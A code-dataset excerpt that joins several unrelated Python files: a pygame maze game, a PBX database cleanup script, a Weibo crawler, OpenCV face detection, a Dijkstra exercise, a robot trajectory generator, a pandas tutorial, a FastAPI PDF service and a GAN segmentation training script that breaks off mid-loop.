pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n # Пауза при нажатии пробела\n pause = not pause\n if pause:\n break # Прервать обработку событий, чтобы во время паузы существа не наносили урон\n if event.type == CREATURE_EVENT_TYPE:\n for creature in CREATURES_GROUP:\n creature.update()\n if event.type == THING_EVENT_TYPE:\n for thing in THING_GROUP:\n thing.update()\n\n if pause:\n # Игра на паузе\n text = create_text(' PAUSE ', font=font, font_color=default_color,\n bg_color=black_color, pos_x=width / 2, pos_y=height / 2)\n screen.blit(*text)\n pygame.display.flip()\n continue\n\n screen.fill((119, 204, 146)) # Цвет фона - это цвет травы\n elapsed_seconds = int(time.time() - start_time) # Время игры в секундах\n\n # Работает постоянно\n player.update()\n\n BLOOD_GROUP.update()\n ALL_SPRITES.draw(screen)\n PLAYER_GROUP.draw(screen)\n\n # изменяем ракурс камеры\n camera.update(player)\n # обновляем положение всех спрайтов\n for sprite in ALL_SPRITES:\n camera.apply(sprite)\n\n # Рисуем полоску статуса игры сверху\n health = '|' * player.health + ' ' * (100 - player.health)\n timer = f'{elapsed_seconds // 60:02}:{elapsed_seconds % 60:02}' # формат времени 00:00\n status_text = ' ' * 15 + f'Health: {health} Time: {timer} Coins: {player.coins:03}' + ' ' * 15\n status_line = create_text(status_text, font=small_font, font_color=default_color,\n bg_color=black_color, pos_x=width / 2, pos_y=height - 10)\n screen.blit(*status_line)\n\n pygame.display.flip()\n clock.tick(fps)\n\n # Создадим несколько текстов\n game_over = create_text('Game Over', font=font, font_color=blood_color,\n pos_x=width / 2, pos_y=height / 2)\n game_win = create_text('Congratulations! You won', font=font, font_color=blood_color,\n pos_x=width / 2, pos_y=height / 2)\n game_win_scores = create_text(f'You have collected {player.coins} coins', font=small_font,\n font_color=blood_color, pos_x=width / 2, pos_y=height / 2 + 30)\n game_win_times = create_text(f'... 
and played {elapsed_seconds} seconds', font=small_font,\n font_color=blood_color, pos_x=width / 2, pos_y=height / 2 + 50)\n\n play_again = False\n\n if player.win is True:\n # Однакратно произвести музыку, если пользователь выйграл\n pygame.mixer.Sound('data/sound_effect/win.wav').play()\n\n if player.win is False and player.health < 1:\n # Однакратно произвести музыку, если пользователь проиграл\n pygame.mixer.Sound('data/sound_effect/game_over.wav').play()\n\n # Игра завершилась, выясняем причину\n while running:\n screen.fill((0, 0, 0))\n\n if player.win is True:\n # Победа!\n screen.blit(*game_win)\n screen.blit(*game_win_scores)\n screen.blit(*game_win_times)\n elif player.health < 1:\n # Игрока съели монстры - проигрыш...\n screen.blit(*game_over)\n else:\n # Другая причина - возможно игру закрыли\n pass\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Любое нажатие мыши или кнопки вернет в начальное меню\n running = False\n play_again = True\n\n pygame.display.update()\n clock.tick(fps)\n\n # Запись в файл результата игры, если Игрок победил\n if player.win:\n result = f'{player.coins}:{elapsed_seconds}:{maze_width}:{maze_height}\\n'\n with open('data/results', mode='a+') as fd:\n fd.write(result)\n\n pygame.quit()\n return play_again\n\n\nclass BloodEffect(pygame.sprite.Sprite):\n # сгенерируем частицы разного размера\n def __init__(self, player, dx, dy):\n super().__init__(ALL_SPRITES, BLOOD_GROUP)\n self.image = load_image('25x25/blood.png')\n self.rect = self.image.get_rect()\n self.player = player\n\n # у каждой частицы своя скорость — это вектор\n self.velocity = [dx, dy]\n # и свои координаты\n self.rect.x, self.rect.y = player.rect.center\n self.rect.y += 10\n\n # гравитация будет одинаковой (значение константы)\n self.gravity = 1\n self.number = random.randint(0, 20) # Чем меньше число, тем больше крови - BLOOD MOD\n self.time = time.time()\n\n def update(self):\n if self.rect.colliderect(self.player) and time.time() - self.time < 0.5: # кровь летит пол секунды\n # применяем гравитационный эффект:\n # движение с ускорением под действием гравитации\n self.velocity[1] += self.gravity\n # перемещаем частицу\n self.rect.x += self.velocity[0]\n self.rect.y += self.velocity[1]\n elif self.number:\n self.kill() # некоторые следы крови остаются на клетках пола\n\n\ndef create_blood(player, damage):\n pygame.mixer.Sound('data/sound_effect/damage.wav').play()\n # количество создаваемых частиц\n blood_count = 10 * damage\n # возможные скорости\n numbers = range(-5, 6)\n for _ in range(blood_count):\n BloodEffect(player, random.choice(numbers), random.choice(numbers))\n\n\ndef create_text(text, font, font_color, bg_color=None, pos_x=0, pos_y=0):\n text = font.render(text, True, font_color, bg_color)\n rect = text.get_rect()\n rect.center = pos_x, pos_y\n return text, rect\n\n\n# http://rosettacode.org/wiki/Maze_generation#Python\n# Волшебное создание лабиринта(из Интернета)\ndef make_maze(w, h):\n vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)]\n ver = [['| '] * w + ['|'] for _ in range(h)] + [[]]\n hor = [['+--'] * w + ['+'] for _ in range(h + 1)]\n\n def walk(x, y):\n vis[y][x] = 1\n\n d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]\n random.shuffle(d)\n for (xx, yy) in d:\n if vis[yy][xx]: continue\n if xx == x: hor[max(y, yy)][x] = '+ '\n if yy == y: ver[y][max(x, xx)] = ' '\n walk(xx, yy)\n\n walk(random.randrange(w), random.randrange(h))\n\n s = ''\n for (a, b) in zip(hor, ver):\n 
# for x in a + b:\n        #     assert x in ('| ', ' ', '+', '|', '+--', '+ '), x\n        s += ''.join(a + ['\\n'] + b + ['\\n'])\n    return s.strip()\n\n\nif __name__ == '__main__':\n    while maze_game():\n        ALL_SPRITES = pygame.sprite.Group()\n        TILES_GROUP = pygame.sprite.Group()\n        PLAYER_GROUP = pygame.sprite.Group()\n        WALL_GROUP = pygame.sprite.Group()\n        FLOOR_GROUP = pygame.sprite.Group()\n        CREATURES_GROUP = pygame.sprite.Group()\n        THING_GROUP = pygame.sprite.Group()\n        EXIT_GROUP = pygame.sprite.Group()\n        BLOOD_GROUP = pygame.sprite.Group()","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":32843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"646171264","text":"#!/usr/bin/python\n\nimport MySQLdb,sys,datetime\n\nconfig = {\n\t'host':'127.0.0.1',\n\t'port':3306,\n\t'user':'freepbxuser',\n\t'passwd':'XXXXXXXXXX',\n\t'db':'asteriskcdrdb',\n}\n\ntry:\n\tcnn = MySQLdb.connect(**config)\nexcept MySQLdb.Error as e:\n\tprint(\"Mysql Error %d: %s\" % (e.args[0], e.args[1]))\n\tsys.exit(3)\n\nendtime = (datetime.datetime.now() - datetime.timedelta(days=1095)).strftime(\"%Y-%m-%d %H:%M:%S\")\ncur = cnn.cursor()\ntable_col = {\n\t'cdr':'calldate',\n\t'cel':'eventtime',\n}\n\nfor key in table_col:\n\tcleanup = \"delete from %s where %s < '%s'\" % (key, table_col[key], endtime)\n\toptimize = \"optimize table %s\" % (key)\n\n\ttry:\n\t\tcur.execute(cleanup)\n\t\tcnn.commit()\n\t\tprint(\"Table %s clean up complete\" % key)\n\texcept:\n\t\tprint(\"Table %s data delete failed!\" % key)\n\t\tcnn.rollback()\n\t\tsys.exit(3)\n\tcur.execute(optimize)\n\tprint(\"Table %s optimized\" % key)\n\t\ncur.close()\ncnn.close()\nsys.exit(0)\n","sub_path":"pbx_db_optimize.py","file_name":"pbx_db_optimize.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"400077416","text":"from collections import deque\nimport re\nimport urllib\nimport urllib2\nimport cookielib\n\ndef get_data(this_url,headers):\n    req = urllib2.Request(this_url,headers=headers)\n    response = urllib2.urlopen(req)\n    data = response.read()\n    return data\n\ndef get_pageNum(data):\n    re_pagenum = ''\n    pattern = re.compile(re_pagenum,re.S)\n    items = re.findall(pattern,data)\n    item=items[0]\n    return int(item[38:-4])\n\ndef get_fansfollow(catch_url,headers):\n    idnset=set()\n    home_page = catch_url+'1'\n    data1 = get_data(home_page,headers)\n    page=get_pageNum(data1)\n\n    re_id = '[^<].*?[^>]'\n    pattern = re.compile(re_id,re.S)\n    for i in range(1,page):\n        this_url = catch_url+str(i)\n        data = get_data(this_url,headers)\n        items = re.findall(pattern,data)\n        for item in items:\n            idnset.add(item[27:37]+item[39:-4])\n    return idnset\n\ndef get_friends(fansset,followset):\n    return fansset&followset\n","sub_path":"weibo_crawler/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"552598883","text":"import cv2\n# import CascadeClassifier, which has a built-in function for detecting faces\nface_cascade=cv2.CascadeClassifier(\"C:\\\\Users\\\\Lenovo\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python38\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml\")\n# read the image as a NumPy array\nimg = cv2.imread(\"C:\\\\Users\\\\Lenovo\\\\Pictures\\\\Camera Roll\\\\image.jpg\",1)\n# convert the image to grayscale\ngrey_img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# 
detectMultiScale is the method that searches for face coordinates\nshapes=face_cascade.detectMultiScale(grey_img,scaleFactor=1.05,minNeighbors=5)\n# draw a rectangle around each detected face in the image\nfor x,y,w,h in shapes:\n    img=cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),3)\n# resize the image to half size\nresized = cv2.resize(img,(int(img.shape[1]/2),int(img.shape[0]/2)))\n# open a window showing the image\ncv2.imshow(\"grey\", resized)\n# how long to keep the window open: with 0 it stays until any key is pressed, then the window disappears\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","sub_path":"facedetection.py","file_name":"facedetection.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"372533819","text":"# ONLY EDIT FUNCTIONS MARKED CLEARLY FOR EDITING\n\nimport numpy as np\n\ndef question06(numServers, targetServer, times):\n    # Dijkstra's algorithm: fastest_times[j] holds the best known time from server 0 to server j\n    if targetServer == 0:\n\n        return 0\n\n    INF = float('inf')\n    fastest_times = [INF] * numServers\n    fastest_times[0] = 0\n    visited = [False] * numServers\n    for i in range(numServers):\n        # visit the unvisited server with the smallest known time\n        visit = min((s for s in range(numServers) if not visited[s]),\n                    key=lambda s: fastest_times[s])\n        if visit == targetServer:\n            break\n        visited[visit] = True\n        new_times = times[visit]\n        # relax every edge leaving the visited server\n        for j in range(numServers):\n            if (new_times[j] + fastest_times[visit] < fastest_times[j]):\n                fastest_times[j] = new_times[j] + fastest_times[visit]\n\n    return fastest_times[targetServer]","sub_path":"q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"248918787","text":"#! /usr/bin/env python\n\n# -*- coding:utf-8 -*-\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport numpy as np\nimport pandas as pd\nclass FootTrajectory:\n    index=0\n    Py0=0.0\n    Px0=0.12\n    Pz0=0.01\n\n    def __init__(self):\n        dist1 = 0.06\n        dist11 = 0.1\n        dist12 = 0.1\n        dist2 = 0.06\n        dist3 = 0.03\n\n        '''\n        #formula eight shape trajectory version 1.0\n        num_targets=400\n        self.num_targets=num_targets\n        target_position=np.array(\n            [[\n                dist2*np.sin(theta)*np.cos(theta),\n                dist2*np.cos(theta),\n                dist3*np.sin(theta)\n            ]\n            for theta in np.linspace(0,np.pi*2.0,num_targets)]\n        )\n        plt.subplot(1,2,1);\n        plt.plot(target_position[:,0]);\n        plt.plot(target_position[:,1]);\n        plt.subplot(1,2,2);\n        plt.plot(target_position[:,0],target_position[:,1]);\n        plt.show();\n        '''\n\n        '''\n        # formula eight shape trajectory version 2.0\n        num_targets=400\n        self.num_targets=num_targets\n        xt,yt,zt=[],[],[]\n        for theta in np.linspace(0,np.pi*2.0,num_targets):\n            #xt.append(dist1*np.sin(theta)*np.cos(theta))\n            xt.append(dist1*np.sin(theta*2.0))\n            yt.append(dist2*np.sin(theta))\n            zt.append(0.0*dist3*np.cos(theta))\n            #dist1 = dist11*yt[-1] if yt[-1] > 0.0 else dist12*yt[-1]\n\n        self.x=zt+self.Px0*np.ones(len(yt))\n        self.y=xt+self.Py0*np.ones(len(xt))\n        self.z=yt+self.Pz0*np.ones(len(zt))\n\n        '''\n        # data from file for eight shape trajectory version 3.0\n        data_file = '/home/suntao/workspace/gorobots/projects/stbot/genesis/catkin_ws/src/stbot/scripts/eightTra.csv'\n        #data_file = '/home/suntao/workspace/gorobots/projects/stbot/genesis/catkin_ws/src/stbot/scripts/parabolaTra.csv'\n        #data_file = './eightTra.csv'\n        resource_data = pd.read_csv(data_file, sep=',', names=['x','y'])\n\n\n        data = np.zeros(resource_data.shape)\n        num_targets=len(data)\n        self.num_targets=num_targets\n        for index in range(2):\n            temp = resource_data.iloc[:,index]\n            
data[:,index]=tuple(temp)\n        self.z=data[:,0]/100.0 + self.Pz0\n        self.y=data[:,1]/35.0 + self.Py0  # leg lift height (taitui gaodu)\n        self.x=np.zeros(self.y.shape) +self.Px0\n        '''\n        # data from file for parabola shape trajectory version 3.0\n        data_file = '/home/suntao/workspace/gorobots/projects/stbot/genesis/catkin_ws/src/stbot/scripts/parabolaTra.csv'\n        resource_data = pd.read_csv(data_file, sep=',', names=['num','x','y'])\n\n\n        data = np.zeros(resource_data.shape)\n        num_targets=len(data)\n        self.num_targets=num_targets\n        for index in range(3):\n            temp = resource_data.iloc[:,index]\n            data[:,index]=tuple(temp)\n        self.z=data[:,1]/100.0 + self.Pz0\n        self.y=data[:,2]/100.0 + self.Py0  # leg lift height (taitui gaodu)\n        self.x=np.zeros(self.y.shape) +self.Px0\n        '''\n    def step(self):\n        if self.index<=self.num_targets-2:\n            self.index=self.index+1\n        else:\n            self.index=0\n\n    def getOutput(self):\n        return [self.x[self.index],self.y[self.index],self.z[self.index]]\n\nif __name__==\"__main__\":\n    FT = FootTrajectory()\n    x,y,z = [],[],[]\n    for idx in range(len(FT.x)):\n        x.append(FT.getOutput()[0])\n        y.append(FT.getOutput()[1])\n        z.append(FT.getOutput()[2])\n        FT.step()\n    plt.subplot(1,2,1);\n    plt.plot(x,'r');\n    plt.plot(y,'b');\n    plt.plot(z,'k');\n    plt.subplot(1,2,2);\n    plt.plot(y,z);\n    fig=plt.figure()\n    ax1 = plt.axes(projection='3d')\n    ax1.plot3D(x,y,z,'g');\n    ax1.set_xlabel('X')\n    ax1.set_ylabel('Y')\n    ax1.set_zlabel('Z')\n\n    plt.show();\n","sub_path":"projects/genesis/catkin_ws/src/stbot_apnc/scripts/eight_shape2.py","file_name":"eight_shape2.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134584393","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[2]:\n\n\nimport pandas as pd\n\n\n# In[5]:\n\n\nlabels=['a','b','c']\nmy_data=[10,20,30]\narr =np.array(my_data)\nd = {'a':10,'b':20,'c':30}\n\n\n# In[6]:\n\n\npd.Series(data=my_data)\n\n\n# In[7]:\n\n\npd.Series(my_data,labels)\n\n\n# In[8]:\n\n\nser1 =pd.Series([1,2,3,4],['USA','GERMANY','USSR','JAPAN'])\n\n\n# In[9]:\n\n\nser1\n\n\n# In[10]:\n\n\nser2=pd.Series([1,2,4,6],['USA','GERMANY','INDIA','JAPAN'])\n\n\n# In[11]:\n\n\nser3=ser1+ser2\n\n\n# In[12]:\n\n\nser3\n\n\n# In[13]:\n\n\nfrom numpy.random import randn\n\n\n# In[14]:\n\n\nnp.random.seed(101)\n\n\n# In[15]:\n\n\ndf =pd.DataFrame(randn(5,4),['A','B','C','D','E'],['W','X','Y','Z'])\n\n\n# In[16]:\n\n\ndf\n\n\n# In[17]:\n\n\ndf['W']\n\n\n# In[18]:\n\n\ndf[['W','Z']]\n\n\n# In[19]:\n\n\ntype(df)\n\n\n# In[20]:\n\n\ndf['new'] = df['W']*df['Y']\n\n\n# In[21]:\n\n\ndf\n\n\n# In[22]:\n\n\ndf.drop('new',axis=1,inplace=True)\n\n\n# In[23]:\n\n\ndf\n\n\n# In[24]:\n\n\ndf.drop('E')\n\n\n# In[25]:\n\n\ndf.drop('E',axis=0)\n\n\n# In[26]:\n\n\ndf.shape\n\n\n# In[27]:\n\n\ndf.loc[['A','B'],['W','Y']]\n\n\n# In[28]:\n\n\ndf\n\n\n# In[30]:\n\n\ndf[df['W']>0]\n\n\n# In[31]:\n\n\ndf.reset_index()\n\n\n# In[32]:\n\n\nnewwind='CA NY WY OR CO'.split()\n\n\n# In[33]:\n\n\ndf['States']=newwind\n\n\n# In[34]:\n\n\ndf\n\n\n# In[36]:\n\n\ndf.set_index('States',inplace=True)\n\n\n# In[37]:\n\n\ndf\n\n\n# In[38]:\n\n\noutside = ['G1','G1','G1','G2','G2','G2']\ninside = [1,2,3,1,2,3]\nhier_index = list(zip(outside,inside))\nhier_index = pd.MultiIndex.from_tuples(hier_index)\n\n\n# In[40]:\n\n\ndf=pd.DataFrame(np.random.randn(6,2),index=hier_index,columns=['A','B'])\ndf\n\n\n# In[41]:\n\n\ndf.loc['G1'].loc[1]\n\n\n# In[42]:\n\n\ndf = pd.DataFrame({'A':[1,2,np.nan],\n                  'B':[5,np.nan,np.nan],\n                  'C':[1,2,3]})\n\n\n# 
In[43]:\n\n\ndf\n\n\n# In[44]:\n\n\ndf.dropna()\n\n\n# In[45]:\n\n\ndf.dropna(axis=1)\n\n\n# In[47]:\n\n\ndf.dropna(thresh=2)\n\n\n# In[48]:\n\n\ndf.fillna(value='Anmol')\n\n\n# In[56]:\n\n\ndf['A'].fillna(value=df['C'].mean())\n\n\n# In[57]:\n\n\ndata = {'Company':['GOOG','GOOG','MSFT','MSFT','FB','FB'],\n 'Person':['Sam','Charlie','Amy','Vanessa','Carl','Sarah'],\n 'Sales':[200,120,340,124,243,350]}\n\n\n# In[58]:\n\n\ndf=pd.DataFrame(data)\n\n\n# In[60]:\n\n\ndf\n\n\n# In[61]:\n\n\ndf.groupby('Company')\n\n\n# In[62]:\n\n\nby_comp=df.groupby('Company')\n\n\n# In[63]:\n\n\nby_comp.mean()\n\n\n# In[64]:\n\n\ndf.groupby('Company').mean()\n\n\n# In[65]:\n\n\nby_comp.std()\n\n\n# In[66]:\n\n\nby_comp.min()\n\n\n# In[67]:\n\n\nby_comp.max()\n\n\n# In[68]:\n\n\nby_comp.describe()\n\n\n# In[72]:\n\n\nby_comp.describe().transpose()['FB']\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Pandas.py","file_name":"Pandas.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429189242","text":"import pdfkit\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom starlette.responses import Response\n\napp = FastAPI(\n docs_url=\"/print_service/docs\",\n openapi_url=\"/print_service/openapi.json\"\n)\n\n\nclass PostData(BaseModel):\n url: str\n filename: str = \"result\"\n\n\n@app.post(\"/\")\ndef index(data: PostData):\n pdf = pdfkit.from_url(data.url, False)\n filename = data.filename or \"output\"\n response = Response(\n pdf,\n headers={\n \"Content-Type\": \"application/pdf\",\n \"Content-Disposition\": f\"attachment; filename={filename}.pdf\",\n \"Content-Length\": str(len(pdf)),\n },\n )\n return response\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390030408","text":"\"\"\"\nCodes for training unsupervised segmentation incorporating shape prior via GAN.\nOptimized based on Mumford-Shah functional & GAN loss in an adversarial way.\n\"\"\"\n\nimport csv\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\n\n# ===================================\n# Import custom codes\n# ===================================\nimport config\nimport lr_scheduler\n\nfrom datasets import LSUNSegDataset\nfrom datasets import shape_prior_dataset\n\nfrom metrics import metric_seg\nfrom losses import gan_r1\nfrom losses import ms_seg_loss\n\nfrom networks import generator\nfrom networks import discriminator\n\n# ===================================\n# Get config\n# ===================================\ntrain_config = config.get_config()\n\n# config - experiment\noutput_dir = train_config.output_dir\nmonitor_interval = train_config.monitor_interval\nnum_plot_img = train_config.num_plot_img\n\n# config - data\nheight = train_config.height\nwidth = train_config.width\nsegment_data_train_dir = train_config.segment_data_train_dir\nsegment_data_val_dir = train_config.segment_data_val_dir\nprior_data_dir = train_config.prior_data_dir\nnum_train_split = train_config.num_train_split\nnum_val_split = train_config.num_val_split\nmin_scale = train_config.min_scale\n\n# config - networks\ntrained_ckpt_path = 
train_config.trained_ckpt_path\nnum_in_channel = train_config.num_in_channel\nnum_out_channel = train_config.num_out_channel\n\n# config - coefficient\ngamma1_tv_seg = train_config.gamma1_tv_seg\ngamma2_tv_region = train_config.gamma2_tv_region\nk_r1 = train_config.k_r1\n\n# config - optimization\nnum_epoch = train_config.num_epoch\ntrain_batch_size = train_config.train_batch_size\nval_batch_size = train_config.val_batch_size\ninit_lr_seg = train_config.init_lr_seg\ntop_lr_seg = train_config.top_lr_seg\nfinal_lr_seg = train_config.final_lr_seg\ninit_lr_discri = train_config.init_lr_discri\ntop_lr_discri = train_config.top_lr_discri\nfinal_lr_discri = train_config.final_lr_discri\nmomentum = train_config.momentum\nweight_decay = train_config.weight_decay\nbeta1_discri = train_config.beta1_discri\nbeta1_generator = train_config.beta1_generator\nnum_discri = train_config.num_discri\n\n# config - training environment\nnum_workers = train_config.num_workers\nmulti_gpu = train_config.multi_gpu\nnum_gpu = train_config.num_gpu\ncuda_id = train_config.cuda_id\n\n# ================================================\n# Set Path & Files to Save Training Result\n# ================================================\n# create output directory\ntry:\n os.mkdir(output_dir)\n print(\"Directory \" , output_dir, \" Created \") \nexcept FileExistsError:\n print(\"Directory \" , output_dir, \" already exists\")\n\n# file path to save .csv files which contain metrics and losses of every iteration\ncsv_metric_train = '{}/metric_train.csv'.format(output_dir)\ncsv_metric_val = '{}/metric_val.csv'.format(output_dir)\ncsv_losses = '{}/losses.csv'.format(output_dir)\nwith open(csv_metric_train, 'w', newline='') as f:\n writer_train = csv.writer(f)\n writer_train.writerow(['epoch', 'iteration', 'iou'])\nwith open(csv_metric_val, 'w', newline='') as f:\n writer_val = csv.writer(f)\n writer_val.writerow(['epoch', 'iteration', 'iou'])\nwith open(csv_losses, 'w', newline='') as f:\n writer_losses = csv.writer(f)\n writer_losses.writerow(['epoch', 'iteration', 'loss discri', 'loss seg'])\n\n# file path to save .txt files which contain best scores info\ntxt_scores_train = '{}/best_scores_train.txt'.format(output_dir)\ntxt_scores_val = '{}/best_scores_val.txt'.format(output_dir)\nwith open(txt_scores_train, 'w', newline='') as f:\n f.write('init score txt file for train' + os.linesep)\nwith open(txt_scores_val, 'w', newline='') as f:\n f.write('init score txt file for val' + os.linesep)\n\n# ===================================\n# define functions to help training\n# ===================================\n# weights initialization function\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n# ===================================\n# Load Data\n# ===================================\n# transforms\ntransform_prior = transforms.Compose([\n transforms.ToTensor(),\n transforms.ToPILImage(),\n transforms.RandomResizedCrop(size=int(height*1.40625), scale=(0.8, 2.5), ratio=(0.2, 5)),\n transforms.RandomAffine(0, translate=(0.05, 0.05), scale=(min_scale,1.6), shear=None),\n transforms.RandomHorizontalFlip(),\n transforms.CenterCrop(size=height),\n transforms.ToTensor()\n])\ntransform_train = transforms.Compose([\n transforms.ToTensor()\n ])\ntransform_val = transforms.Compose([\n transforms.ToTensor()\n ])\ntransform_target = 
transforms.Compose([\n transforms.ToTensor()\n ]) \n\n# datasets\ndataset_prior = shape_prior_dataset.PriorDataset(prior_data_dir,transform=transform_prior)\n\ndataset_train = LSUNSegDataset.LSUNSegTrainDataset(\n segment_data_train_dir,\n num_train_split,\n transform=transform_train,\n transform_gt=transform_target)\n\ndataset_val = LSUNSegDataset.LSUNSegValDataset(\n segment_data_val_dir,\n num_val_split,\n transform=transform_val,\n transform_gt=transform_target)\n\n# dataloaders\nloader_prior = torch.utils.data.DataLoader(\n dataset = dataset_prior,\n batch_size=train_batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=True)\n\nloader_train = torch.utils.data.DataLoader(\n dataset = dataset_train,\n batch_size=train_batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=True)\n\nloader_val = torch.utils.data.DataLoader(\n dataset = dataset_val,\n batch_size=val_batch_size,\n shuffle=True,\n num_workers=num_workers,\n drop_last=False)\n\n# ===================================\n# Set Train Env\n# ===================================\ntorch.cuda.set_device(cuda_id)\ncuda = True if torch.cuda.is_available() else False\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nif multi_gpu:\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available()) else \"cpu\")\n ngpu = num_gpu # should be modified to specify multiple gpu ids to be used\nelif cuda_id:\n device = torch.device(cuda_id)\n ngpu = 1\nelse:\n device = torch.device('cpu')\n ngpu = 0\n\n# ===================================\n# Set Model\n# ===================================\nmodel_discriminator = discriminator.Discriminator().to(device)\nmodel_segment_encoder = generator.Encoder(num_in_channel, num_out_channel).to(device)\nmodel_segment_decoder_seg = generator.DecoderSeg(num_in_channel, num_out_channel).to(device)\nmodel_segment_decoder_region = generator.DecoderRegion(num_in_channel, num_out_channel).to(device)\n\n# if multiple gpus are used, set dataparallel\nif multi_gpu == True:\n model_discriminator = nn.DataParallel(model_discriminator, list(range(num_gpu)))\n model_segment_encoder = nn.DataParallel(model_segment_encoder, list(range(num_gpu)))\n model_segment_decoder_seg = nn.DataParallel(model_segment_decoder_seg, list(range(num_gpu)))\n model_segment_decoder_region = nn.DataParallel(model_segment_decoder_region, list(range(num_gpu)))\n\n# init model parameters\nmodel_discriminator.apply(weights_init)\n\n# optimizers\noptimizer_discriminator = optim.Adam(model_discriminator.parameters(), lr = init_lr_discri, betas=(beta1_discri, 0.999))\nseg_parameters = list(model_segment_encoder.parameters()) + list(model_segment_decoder_seg.parameters()) + list(model_segment_decoder_region.parameters())\noptimizer_segment = optim.Adam(seg_parameters, lr = init_lr_seg, betas=(beta1_generator, 0.999))\n\nscheduler_discriminator = lr_scheduler.scheduler_learning_rate_sigmoid_double(optimizer_discriminator, lr_initial=init_lr_discri, lr_top=top_lr_discri, lr_final=final_lr_discri, numberEpoch=(num_epoch), ratio=0.25, alpha=10, beta=0, epoch=-1) \nscheduler_segment = lr_scheduler.scheduler_learning_rate_sigmoid_double(optimizer_segment, lr_initial=init_lr_seg, lr_top=top_lr_seg, lr_final=final_lr_seg, numberEpoch=(num_epoch), ratio=0.25, alpha=10, beta=0, epoch=-1)\n\n# ==================================================\n# Init variables to save training results\n# ==================================================\nt = Variable(torch.Tensor([0.5])).to(device) # set threshold value\nlosses_discri = 
[]\nlosses_seg = []\ntrain_iou = []\ntrain_epoch_avg_iou = []\ntrain_best_epoch_avg_iou = [0, 0]\nval_iou = []\nval_epoch_avg_iou = []\nval_best_epoch_avg_iou = [0, 0]\n\n# ==============================\n# Start Training\n# ==============================\nfor epoch in range(num_epoch):\n if epoch == 0:\n print('device:', device)\n print(\"start train epoch{}:\".format(epoch))\n scheduler_discriminator.step(epoch)\n scheduler_segment.step(epoch)\n real_label = 1\n fake_label = 0\n scores_sum_iou = 0\n num_iters_discri = 0\n num_iters_seg = 0\n\n # =============================\n # Train\n # =============================\n prior_dataloader_iterator = iter(loader_prior)\n for i, data_input in enumerate(loader_train, 0):\n try:\n data_prior = next(prior_dataloader_iterator)\n except StopIteration:\n prior_dataloader_iterator = iter(loader_prior)\n data_prior = next(prior_dataloader_iterator)\n imgs_prior = Variable(data_prior.type(Tensor)).to(device)\n imgs_input = Variable(data_input[0].type(Tensor)).to(device)\n imgs_gt = Variable(data_input[1].type(Tensor)).to(device)\n\n # -----------------------------\n # Train Discriminator\n # -----------------------------\n gan_r1.toggle_grad(model_segment_encoder, False)\n gan_r1.toggle_grad(model_segment_decoder_seg, False)\n gan_r1.toggle_grad(model_segment_decoder_region, False)\n gan_r1.toggle_grad(model_discriminator, True)\n # model_segment_decoder_seg.train()\n model_discriminator.train()\n optimizer_discriminator.zero_grad()\n\n # train discriminator with prior data\n imgs_prior.requires_grad_()\n validity_prior = model_discriminator(imgs_prior)\n loss_discri_real = gan_r1.compute_loss(validity_prior, 1)\n loss_discri_real.backward(retain_graph=True)\n reg = k_r1 * gan_r1.compute_grad2(validity_prior, imgs_prior).mean()\n reg.backward()\n\n # train discriminator with generated segmentation result\n with torch.no_grad():\n code = model_segment_encoder(imgs_input)\n imgs_seg = model_segment_decoder_seg(code)\n # imgs_roi, imgs_bg = model_segment_decoder_region(code)\n imgs_seg.requires_grad_()\n validity_seg = model_discriminator(imgs_seg)\n loss_discri_fake = gan_r1.compute_loss(validity_seg, 0)\n loss_discri_fake.backward()\n\n # full discriminator loss\n loss_discri = loss_discri_real + reg + loss_discri_fake\n\n # optimization\n optimizer_discriminator.step()\n num_iters_discri += 